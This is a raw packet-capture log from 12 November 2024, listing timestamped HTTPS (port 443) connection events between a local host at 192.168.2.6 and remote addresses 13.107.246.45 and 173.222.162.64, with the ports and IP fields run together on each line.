                                                        Nov 12, 2024 16:27:24.449479103 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.449516058 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.449565887 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.449662924 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.449662924 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.449944019 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.449944019 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.449974060 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.449982882 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.453627110 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.453672886 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.453838110 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.453929901 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.453942060 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.499977112 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.501163006 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.501163006 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.501183033 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.501193047 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.631602049 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.631690025 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.631897926 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.631992102 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.632009029 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.632019043 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.632024050 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.635979891 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.636030912 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.636086941 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.636302948 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.636318922 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.743978024 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.744651079 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.744668961 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.745127916 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.745131969 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.835735083 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.837162971 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.837179899 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.838052034 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.838057995 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.875282049 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.875339985 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.875386000 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.875391960 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.875442028 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.875695944 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.875710011 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.875720978 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.875725985 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.878810883 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.878844023 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.879117012 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.879292011 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.879302025 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.967896938 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.967930079 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.967988968 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.968003035 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.968017101 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.968056917 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.968240976 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.968257904 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.968271971 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.968276978 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.971484900 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.971520901 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.971587896 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.971735001 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.971749067 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.197351933 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.207274914 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.207300901 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.207776070 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.207782984 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.337178946 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.337826014 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.338066101 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.338094950 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.338119984 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.338133097 CET49885443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.338139057 CET4434988513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.341104031 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.341159105 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.341237068 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.341427088 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.341443062 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.622164965 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.623258114 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.623258114 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.623272896 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.623289108 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.753640890 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.753753901 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.753951073 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.754086018 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.754086018 CET49887443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.754105091 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.754115105 CET4434988713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.757137060 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.757209063 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:25.757303953 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.757466078 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:25.757483006 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.086828947 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.087976933 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.087976933 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.088016033 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.088026047 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.215688944 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.215749979 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.216155052 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.216155052 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.216197014 CET49889443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.216224909 CET4434988913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.219547987 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.219575882 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.219748974 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.219907999 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.219923973 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.483984947 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.485094070 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.485094070 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.485136032 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.485158920 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.531887054 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.532444954 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.532490969 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.532867908 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.532874107 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.620024920 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.620054960 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.620105028 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.620110989 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.620197058 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.620420933 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.620445967 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.620460987 CET49890443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.620466948 CET4434989013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.623691082 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.623742104 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.623810053 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.623977900 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.623991966 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.662914038 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.662983894 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.663261890 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.663320065 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.663345098 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.663357973 CET49886443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.663362980 CET4434988613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.666627884 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.666676044 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:26.666754961 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.666999102 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:26.667011023 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.169603109 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.170171022 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.170201063 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.170705080 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.170711040 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.305758953 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.305828094 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.305897951 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.306185007 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.306202888 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.306212902 CET49891443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.306220055 CET4434989113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.309577942 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.309612036 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.309669971 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.309855938 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.309869051 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.352360964 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.352822065 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.352833986 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.353310108 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.353313923 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.399882078 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.400363922 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.400389910 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.401058912 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.401065111 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.482980967 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.483050108 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.483107090 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.483690023 CET49892443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.483702898 CET4434989213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.490093946 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.490130901 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.490384102 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.490657091 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.490665913 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.542433977 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.542500973 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.542644024 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.543508053 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.543519020 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.543529987 CET49893443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.543534994 CET4434989313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.553149939 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.553195953 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:27.553287983 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.553524017 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:27.553539991 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.044955969 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.045655012 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.045706034 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.046468973 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.046489000 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.179667950 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.179693937 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.179740906 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.179775953 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.179882050 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.180171967 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.180197954 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.180228949 CET49894443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.180234909 CET4434989413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.188184023 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.188213110 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.192253113 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.192667007 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.192679882 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.226826906 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.227665901 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.227694988 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.230262995 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.230269909 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.360433102 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.360512018 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.360649109 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.360846996 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.360846996 CET49895443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.360866070 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.360874891 CET4434989513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.363740921 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.363810062 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.363948107 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.364151955 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.364173889 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.658113956 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.677895069 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.677938938 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.678881884 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.678900003 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.806730032 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.806756020 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.806809902 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.806830883 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.806865931 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.927381039 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.940758944 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.940807104 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.940825939 CET49896443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.940833092 CET4434989613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.942852020 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.942881107 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.943361044 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.943367004 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.945892096 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.945919991 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:28.945974112 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.946166039 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:28.946175098 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.072891951 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.072957039 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.073000908 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.078871965 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.078905106 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.078926086 CET49897443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.078943968 CET4434989713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.090012074 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.090071917 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.090136051 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.091490984 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.091505051 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.317768097 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.318784952 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.318837881 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.320283890 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.320297003 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.488315105 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.488393068 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.488442898 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.505748987 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.505775928 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.505793095 CET49898443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.505798101 CET4434989813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.512178898 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.512217045 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.512312889 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.512768984 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.512778997 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.694149017 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.695071936 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.695087910 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.696079969 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.696084976 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.838656902 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.838728905 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.838784933 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.839282990 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.839304924 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.839354038 CET49899443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.839359999 CET4434989913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.843597889 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.843674898 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.843878031 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.844096899 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.844115019 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.859958887 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.860488892 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.860507965 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.861290932 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:29.861296892 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.863914967 CET44349805173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:29.864003897 CET49805443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:29.996448994 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.997320890 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:29.997396946 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.019345999 CET49900443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.019368887 CET4434990013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.023894072 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.023936033 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.024013042 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.024296045 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.024307966 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.280002117 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.280608892 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.280622005 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.281208038 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.281213999 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.411432028 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.412185907 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.412286043 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.412349939 CET49901443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.412364960 CET4434990113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.415278912 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.415307999 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.415442944 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.416228056 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.416234970 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.579766035 CET4434990213.107.246.45192.168.2.6
